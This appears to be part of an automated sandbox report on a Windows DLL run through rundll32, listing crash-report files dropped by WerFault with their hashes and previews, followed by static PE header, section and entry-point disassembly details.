Entropy (8bit): 3.763578802257413
Encrypted: false
SSDEEP: 192:Nyc0iA0oX1HBUZMX4jed+5/u7sMS274It7cl:X0iWXlBUZMX4jeU/u7sMX4It7cl
MD5: AB66B0C65430D7784DCE9F3BFD18E012
SHA1: AE58C3155D963E5024E45440CFB891E9BD61DB13
SHA-256: 0D3F8A590A42953E0C4B0592B7331C6F080DEDF99C372F3AE4B8D0625DDB97B3
SHA-512: 890813DF532F81B17C3A7F7B28A2038E88748D112CCD989CC3E82C09CFC34F5CACCE5034E508068BF9EC84B8839F9A47DA42FF3B137CCD20C2D93A5F8AA3FA9B
Malicious: false
Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.8.4.9.8.6.4.8.2.3.0.3.7.7.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.8.4.9.8.6.5.5.5.7.4.0.3.6.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.2.7.9.1.5.7.f.-.4.b.e.0.-.4.4.7.8.-.9.9.d.2.-.f.4.2.a.e.7.9.c.a.0.2.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.a.d.a.2.c.f.7.-.b.8.d.e.-.4.1.f.0.-.9.e.4.2.-.e.0.3.c.d.6.9.a.8.8.9.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.c.4.-.0.0.0.1.-.0.0.1.c.-.2.d.7.4.-.1.0.a.1.3.d.b.f.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1549.tmp.WERInternalMetadata.xml
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category: dropped
Size (bytes): 8406
Entropy (8bit): 3.698743070989418
Encrypted: false
SSDEEP: 192:Rrl7r3GLNi3jd6W6YVD96dgmf8NSMCprC89bnwUWsfStm:RrlsNiTd6W6YJ96dgmf8NSvnwU1fB
MD5: 843C76288B5B86E920CBDAFDF7178B67
SHA1: 014D8DDC43C2CFC67BBBF093D60C71A800068F55
SHA-256: C169356D757A52AEAEDA71E531886B3481BEA92953B9B11A01F7D5D07A934A5A
SHA-512: F168C58370610308E24B530BD778B881D87665AE5EC988219D2A89A03BAFACD53CB51268AD250FC8B24F67DADEEE2EBE855FDF3C62923FC6C6FD5EA3D0DF3378
Malicious: false
Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.0.8.4.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER18F4.tmp.xml
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 4771
Entropy (8bit): 4.481204319652307
Encrypted: false
SSDEEP: 48:cvIwSD8zsPJgtWI9pFWSC8Bl78fm8M4JCdsPMFGD+q8vjsPKI4SrSxd:uITfxC0SNb4JdxKmdDWxd
MD5: B3096293B157544A11E07B9BC420DD68
SHA1: 57259C5A2E808FD52947AE76E5F47FB0E56FF8B8
SHA-256: 6ECFDFC49D3ED528BFC1B179F42DF660BAA7F19736D51855C79376AE6F4FE475
SHA-512: 581BFB1D0B14C0309E3B64C3D8D1260118245471C7B67F9B3E932508193A3953ADF51D007157CC9D27797DACDEC1888B683B829AF1D3A97D6BB2D9D6F8C1F5CD
Malicious: false
Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1206301" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1DF3.tmp.dmp
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Mini DuMP crash report, 15 streams, Tue Oct 12 07:50:56 2021, 0x1205a4 type
Category: dropped
Size (bytes): 57848
Entropy (8bit): 2.011654227292554
Encrypted: false
SSDEEP: 192:0eaydMcdJA1SL+3x+8nKyCPEAUXjxQk76EVEMRoQwv5jYMOnPTgD:80McbA1SL+3x+8nwPEftQiV8QwROTq
MD5: 56D9C114464C0EAB37C5F1BA2CA25BD9
SHA1: CB86B8F90DE79CF655931CC1473376206F3AB4F1
SHA-256: 7A50D18CA338C0603708D0AAE04ACE11D6AFAABB62E18955544488A0789FD2C1
SHA-512: F726BEEBEFD4EEC6630471826DADF2A8000272FEC02C2B037B14F4B6291A3AF158C86D9A22FE99B6D38133BA26352717A19333FEBF3ED66C3F23034190571238
Malicious: false
Preview: MDMP....... .......`>ea...................U...........B..............GenuineIntelW...........T.......|....=ea.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER2A87.tmp.WERInternalMetadata.xml
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):8302
                                                                                                                                Entropy (8bit):3.694733762852044
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:Rrl7r3GLNiYjA6yj6YVx6dgmfTkOSiCpDp89bRRsf8U7m:RrlsNiSA6Q6Yj6dgmfTkOS0RKf8
                                                                                                                                MD5:AF2F6F97AC027E2DE27FA9E9412E71C6
                                                                                                                                SHA1:F7A825A5D6E3D83D7F5DD819370635A22A337A12
                                                                                                                                SHA-256:EC4A2E76921EE09528478069C9C4AFD67F13B7D091456816762F9754E888BBC4
                                                                                                                                SHA-512:C51ABDEC5497BBC13BFE4C4561DB25FE8D0CC7F0EA242C52FE4EEF90D13B26F4B77DB4710F99B1679ACC20428771F47D94494644DF55F99CB2FBDBA4102D58F9
                                                                                                                                Malicious:false
                                                                                                                                Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.0.1.2.<./.P.i.d.>.......
                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER2AA5.tmp.dmp
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:Mini DuMP crash report, 15 streams, Tue Oct 12 07:51:00 2021, 0x1205a4 type
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):35284
                                                                                                                                Entropy (8bit):2.385701210745147
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:QhtbBKt5jXjMzQ1IDZqyqU10+hesUgks4TUhegfXPO+:cBKDrQzQaqyNhe7gATUD/V
                                                                                                                                MD5:26D47BBB77204AEDD136BCC1854DA26A
                                                                                                                                SHA1:CA3F25C975A62C71298F927C5636EB23E6E7D066
                                                                                                                                SHA-256:594A65A664C3A120943D2C24EF892E6C7E3C72FD169628A57A4039B4714593F7
                                                                                                                                SHA-512:F58931527BA57F956163D14848BF67B1E0876609C0144226A74316058E70503F6331BABC6161AB40994338E3D0B6CD212D5944ABACACCB87D5C03D6C38D2698C
                                                                                                                                Malicious:false
                                                                                                                                Preview: MDMP....... .......d>ea...................U...........B..............GenuineIntelW...........T............=ea.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER2F6A.tmp.xml
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4630
                                                                                                                                Entropy (8bit):4.4533004304049015
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:cvIwSD8zsPJgtWI9pFWSC8BV8fm8M4JCds9FhF9I+q8/5WY4SrS1d:uITfxC0SNAJ3kHYDW1d
                                                                                                                                MD5:361E1FB3A3A1D969F46C202D9F6A6BE9
                                                                                                                                SHA1:2CB93394875E4A71BFB33DA586C42FB25F9FA40D
                                                                                                                                SHA-256:41E6D6A75CCF51226DE7B4D0C8015FD4D2D4DA5CC95EF56E60F411B8CE2834C4
                                                                                                                                SHA-512:8708A1C8FE3F89B87370FAE532A4877E25F4B43661C491A6A89F94843EC94E772CC730730213F40C9B6021FB88E55DA7BBC66D985609959E4760DEDBDAD17448
                                                                                                                                Malicious:false
                                                                                                                                Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1206301" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER3E5D.tmp.WERInternalMetadata.xml
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):8406
                                                                                                                                Entropy (8bit):3.699426610909095
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:Rrl7r3GLNiEjt6EJ6YV/6dgmf8NSMCprs89bxKsf6bm:RrlsNi+t6EJ6Yt6dgmf8NStxpfv
                                                                                                                                MD5:C68EE9F1E9CC2120F276F341A19B2ADC
                                                                                                                                SHA1:C356502CDA05C48684274ACDC1EF601B7C0BCB42
                                                                                                                                SHA-256:8E92D82339769DC546E938521D48F02B2295CCC867E96DA3A0C9B9802662DFE8
                                                                                                                                SHA-512:82A56DCB8302FB319A22119AD036E6DF508C00722338CDB6AC58F8ADC26966836AA6D7F2EFF9BD9E724D035423923155E8191EC36656859655A0B2B16A89CA36
                                                                                                                                Malicious:false
                                                                                                                                Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.3.6.0.<./.P.i.d.>.......
                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER49E7.tmp.xml
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4771
                                                                                                                                Entropy (8bit):4.482639623381592
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:cvIwSD8zsPJgtWI9pFWSC8Bq8fm8M4JCdsPMFP+q8vjsPu4SrSchd:uITfxC0SNNJdmKmuDW4d
                                                                                                                                MD5:4907E384041C5C9D778C701F72E97A31
                                                                                                                                SHA1:70EC43A7F6AAC60CC85361597425778220A4B820
                                                                                                                                SHA-256:6EA365475E9D5B0E05E821C2FF98D74B4F13311B4C9BF2CBA7FEFA13C8D3BE0B
                                                                                                                                SHA-512:417778634689D92CA355958B0791321F83CD9672E3A0CE8F07DB83A6E7EA2FA69AF2CD76D51DC38FD46924132E9F17FC24CB10A54E93F2C023055C31EB70F39B
                                                                                                                                Malicious:false
                                                                                                                                Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1206301" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER923.tmp.dmp
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:Mini DuMP crash report, 15 streams, Tue Oct 12 07:50:51 2021, 0x1205a4 type
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):35708
                                                                                                                                Entropy (8bit):2.3486234062735507
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:Ppoob1NtADw07S8VXjMzQ1IDZqcqa15q+TlYzGEfShfTHHcR:BoobxfR8VQzQaqcJq+JYzGEMTHk
                                                                                                                                MD5:AB79F102EB23B8810370F156BF99C2F3
                                                                                                                                SHA1:AB6185126C490366EA9A2DB1356D419BBF92B2D9
                                                                                                                                SHA-256:DF08B5455FE3079A4AFFE403CE6D1CD2E809784433C83BC1565BDB6835CA7C0E
                                                                                                                                SHA-512:CBDE020EB79704CB9008A597BB27102DD4393583CE542ECB48B1664A9864321A994FDB4F973018FDDE12CEF573274DA211256A37DEB0D755A093865DBCCCFBC8
                                                                                                                                Malicious:false
                                                                                                                                Preview: MDMP....... .......[>ea...................U...........B..............GenuineIntelW...........T............=ea.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

                                                                                                                                Static File Info

                                                                                                                                General

                                                                                                                                File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Entropy (8bit):6.669952151971332
                                                                                                                                TrID:
                                                                                                                                • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                                                • DOS Executable Generic (2002/1) 0.20%
                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                File name:616412739e268.dll
                                                                                                                                File size:718336
                                                                                                                                MD5:9e67e68ddbedba865b91b5469ab642ef
                                                                                                                                SHA1:f2c7b0735343081be06e48616d0fc14235a28744
                                                                                                                                SHA256:41c0934ba1be030dbae45893107f6a2ae5f99c79d7634626263cdf809f7556ee
                                                                                                                                SHA512:802d983ca7ca04ae737da69ed5772eece8f408c6c02c8d0c42cfea1c1abf25236b02c35c09d56f3ba6a229b3b71f72fa3d4c6735c8670c76affdbbc139b63d87
                                                                                                                                SSDEEP:12288:aUAQSxl6fDEr8Np6b/rPPsjosrS9aEoe+0JCym+4YJAOSVUNcuHIGF4uW/XrGAsV:az3xl6fq8Np6bTPPaBreaZlYCOSVol2a
                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m$aV.J2V.J2V.J2...2U.J2_t.2H.J2.cH3R.J2.cO3_.J2.cI3D.J2...2H.J2V.K2..J2.cO3).J2.cJ3W.J2.cJ3W.J2V..2W.J2.cH3W.J2RichV.J2.......

                                                                                                                                File Icon

                                                                                                                                Icon Hash:74f0e4ecccdce0e4

                                                                                                                                Static PE Info

                                                                                                                                General

                                                                                                                                Entrypoint:0x1003ab77
                                                                                                                                Entrypoint Section:.text
                                                                                                                                Digitally signed:false
                                                                                                                                Imagebase:0x10000000
                                                                                                                                Subsystem:windows gui
                                                                                                                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                                                Time Stamp:0x5F700BB2 [Sun Sep 27 03:49:06 2020 UTC]
                                                                                                                                TLS Callbacks:
                                                                                                                                CLR (.Net) Version:
                                                                                                                                OS Version Major:6
                                                                                                                                OS Version Minor:0
                                                                                                                                File Version Major:6
                                                                                                                                File Version Minor:0
                                                                                                                                Subsystem Version Major:6
                                                                                                                                Subsystem Version Minor:0
                                                                                                                                Import Hash:b5c6badd398e2e3aa283a40a40432c6c

                                                                                                                                Entrypoint Preview

                                                                                                                                Instruction
                                                                                                                                push ebp
                                                                                                                                mov ebp, esp
                                                                                                                                cmp dword ptr [ebp+0Ch], 01h
                                                                                                                                jne 00007F018CD7E347h
                                                                                                                                call 00007F018CD7EE32h
                                                                                                                                push dword ptr [ebp+10h]
                                                                                                                                push dword ptr [ebp+0Ch]
                                                                                                                                push dword ptr [ebp+08h]
                                                                                                                                call 00007F018CD7E1EAh
                                                                                                                                add esp, 0Ch
                                                                                                                                pop ebp
                                                                                                                                retn 000Ch
                                                                                                                                mov ecx, dword ptr [ebp-0Ch]
                                                                                                                                mov dword ptr fs:[00000000h], ecx
                                                                                                                                pop ecx
                                                                                                                                pop edi
                                                                                                                                pop edi
                                                                                                                                pop esi
                                                                                                                                pop ebx
                                                                                                                                mov esp, ebp
                                                                                                                                pop ebp
                                                                                                                                push ecx
                                                                                                                                ret
                                                                                                                                mov ecx, dword ptr [ebp-10h]
                                                                                                                                xor ecx, ebp
                                                                                                                                call 00007F018CD7DF43h
                                                                                                                                jmp 00007F018CD7E320h
                                                                                                                                mov ecx, dword ptr [ebp-14h]
                                                                                                                                xor ecx, ebp
                                                                                                                                call 00007F018CD7DF32h
                                                                                                                                jmp 00007F018CD7E30Fh
                                                                                                                                push eax
                                                                                                                                push dword ptr fs:[00000000h]
                                                                                                                                lea eax, dword ptr [esp+0Ch]
                                                                                                                                sub esp, dword ptr [esp+0Ch]
                                                                                                                                push ebx
                                                                                                                                push esi
                                                                                                                                push edi
                                                                                                                                mov dword ptr [eax], ebp
                                                                                                                                mov ebp, eax
                                                                                                                                mov eax, dword ptr [100AA0D4h]
                                                                                                                                xor eax, ebp
                                                                                                                                push eax
                                                                                                                                push dword ptr [ebp-04h]
                                                                                                                                mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                                                lea eax, dword ptr [ebp-0Ch]
                                                                                                                                mov dword ptr fs:[00000000h], eax
                                                                                                                                ret
                                                                                                                                push eax
                                                                                                                                push dword ptr fs:[00000000h]
                                                                                                                                lea eax, dword ptr [esp+0Ch]
                                                                                                                                sub esp, dword ptr [esp+0Ch]
                                                                                                                                push ebx
                                                                                                                                push esi
                                                                                                                                push edi
                                                                                                                                mov dword ptr [eax], ebp
                                                                                                                                mov ebp, eax
                                                                                                                                mov eax, dword ptr [100AA0D4h]
                                                                                                                                xor eax, ebp
                                                                                                                                push eax
                                                                                                                                mov dword ptr [ebp-10h], eax
                                                                                                                                push dword ptr [ebp-04h]
                                                                                                                                mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                                                lea eax, dword ptr [ebp-0Ch]
                                                                                                                                mov dword ptr fs:[00000000h], eax
                                                                                                                                ret
                                                                                                                                push eax
                                                                                                                                inc dword ptr fs:[eax]

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0xa8990          0x80          .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT          0xa8a10          0x50          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x0              0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x146000         0x53d0        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0xa474c          0x54          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0xa47a0          0x40          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x7b000          0x1fc         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
.text   0x1000           0x79f71       0x7a000   False     0.510071801358   data       6.75463290974  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata  0x7b000          0x2e586       0x2e600   False     0.556366871631   data       5.60181106954  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0xaa000          0x9b19c       0x1800    False     0.190266927083   data       4.15778005426  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc  0x146000         0x53d0        0x5400    False     0.752650669643   data       6.72453697464  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL           Import
